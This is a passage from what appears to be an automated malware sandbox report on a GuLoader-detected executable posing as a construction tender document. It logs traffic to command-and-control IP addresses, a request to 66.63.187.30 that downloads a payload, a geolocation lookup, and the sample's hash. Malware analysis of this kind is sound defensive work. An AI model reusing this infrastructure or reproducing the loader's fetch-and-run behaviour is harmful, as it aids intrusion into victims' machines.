                                                                                                                        Dec 16, 2024 16:18:53.541610003 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.541698933 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.541759968 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.543101072 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.543248892 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.543303967 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.551805973 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.551820040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.551884890 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.623369932 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.662966013 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.695419073 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.695554972 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.695635080 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.699625969 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.699686050 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.699742079 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.708313942 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.708422899 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.708488941 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.717298985 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.717322111 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.717385054 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.725701094 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.725791931 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.725857019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.733218908 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.733274937 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.733333111 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.741185904 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.741322041 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.741393089 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.749454975 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.749548912 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.749608994 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.758044958 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.758107901 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.758168936 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.766748905 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.766817093 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.766874075 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.775533915 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.775559902 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.775648117 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.784018040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.784188032 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.784255028 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.792851925 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.834810019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.887181044 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.887212038 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.887356043 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.890743971 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.890836954 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.890896082 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.897917986 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.897958040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.898034096 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.905045986 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.905139923 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.905208111 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.912611008 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.912796021 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.912852049 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.919184923 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.919230938 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:53.919291019 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:53.923775911 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.275089025 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.275144100 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.275273085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.276705980 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.276762009 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.276766062 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.278454065 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.278518915 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.278533936 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.280452967 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.280464888 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.280518055 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.282097101 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.282175064 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.282197952 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.283838034 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.283917904 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.283960104 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.285568953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.285641909 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.285845995 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.287352085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.287420034 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.287450075 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.288889885 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.288975954 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.288999081 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.290513992 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.290641069 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.291585922 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.292234898 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.292308092 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.292424917 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.293909073 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.293951988 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.294023991 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.295420885 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.295464039 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.295489073 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.296941042 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.297013998 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.297039986 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.298275948 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.298360109 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.298412085 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.299777031 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.299850941 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.299896955 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.301372051 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.301445007 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.301455021 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.302809954 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.302858114 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.302891970 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.304323912 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.304398060 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.309089899 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.309158087 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.309226990 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.309581041 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.309684992 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.309730053 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.310902119 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.311094999 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.311146021 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.312191010 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.312391996 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.312454939 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.313692093 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.313803911 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.313848972 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.315217018 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.315363884 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.315408945 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.316935062 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.317013979 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.317074060 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.318135023 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.318223953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.318284035 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.319437981 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.319570065 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.319644928 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.320878029 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.321012020 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.321052074 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.322324991 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.322448015 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.322499990 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.323926926 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.323946953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.323987961 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.325364113 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.325591087 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.325650930 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.326668978 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.326778889 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.326824903 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.328166008 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.328314066 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.328360081 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.329641104 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.329794884 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.329899073 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.331027031 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.331176996 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.331229925 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.332475901 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.332590103 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.332643032 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.333930016 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.334029913 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.334084034 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.335489988 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.335696936 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.335756063 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.337081909 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.337136984 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.337196112 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.338367939 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.338547945 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.338614941 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.339739084 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.339869976 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.339936972 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.341207981 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.341352940 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.341409922 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.342715025 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.342853069 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.342900038 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.344202042 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.344297886 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.344347954 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.345794916 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.345901012 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.345954895 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.347270966 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.347423077 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.347477913 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.348639965 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.348762989 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.348809958 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.350219965 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.350289106 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.350344896 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.352395058 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.664463043 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.664525032 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.665435076 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.665510893 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.665561914 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.666589022 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.666713953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.666759014 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.667749882 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.667937040 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.667987108 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.668930054 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.669028997 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.669073105 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:54.670046091 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.670154095 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:54.670196056 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:56.962496042 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.147308111 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147331953 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147340059 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147349119 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147356987 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147367001 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147375107 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147382975 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147391081 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147388935 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.147401094 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.147428036 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:18:57.267787933 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267800093 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267808914 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.267812967 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268044949 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268055916 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268471956 CET240449738162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:18:57.268534899 CET497382404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:14.390125990 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:14.391990900 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:14.511816978 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:44.465233088 CET240449737162.251.122.87192.168.2.4
                                                                                                                        Dec 16, 2024 16:19:44.467070103 CET497372404192.168.2.4162.251.122.87
                                                                                                                        Dec 16, 2024 16:19:44.587343931 CET240449737162.251.122.87192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 16:18:51.477490902 CET | 54821 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 16:18:51.715620041 CET | 53 | 54821 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 16:18:51.477490902 CET | 192.168.2.4 | 1.1.1.1 | 0x3b4e | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 16:18:51.715620041 CET | 1.1.1.1 | 192.168.2.4 | 0x3b4e | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                        • 66.63.187.30
                                                                                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 66.63.187.30 | 80 | 7864 | C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:18:43.989994049 CET | 178 | OUT
GET /wBWcspgeBmkxYD199.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: 66.63.187.30
Cache-Control: no-cache
Dec 16, 2024 16:18:45.335046053 CET | 1236 | IN
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sun, 15 Dec 2024 21:04:46 GMT
Accept-Ranges: bytes
ETag: "4b7db7f8344fdb1:0"
Server: Microsoft-IIS/10.0
Date: Mon, 16 Dec 2024 15:18:45 GMT
Content-Length: 493120


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 178.237.33.50 | 80 | 7864 | C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:18:51.839926004 CET | 71 | OUT
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 16, 2024 16:18:53.084805012 CET | 1171 | IN
HTTP/1.1 200 OK
date: Mon, 16 Dec 2024 15:18:52 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                        Target ID:0
                                                                                                                        Start time:10:18:03
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:10:18:29
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
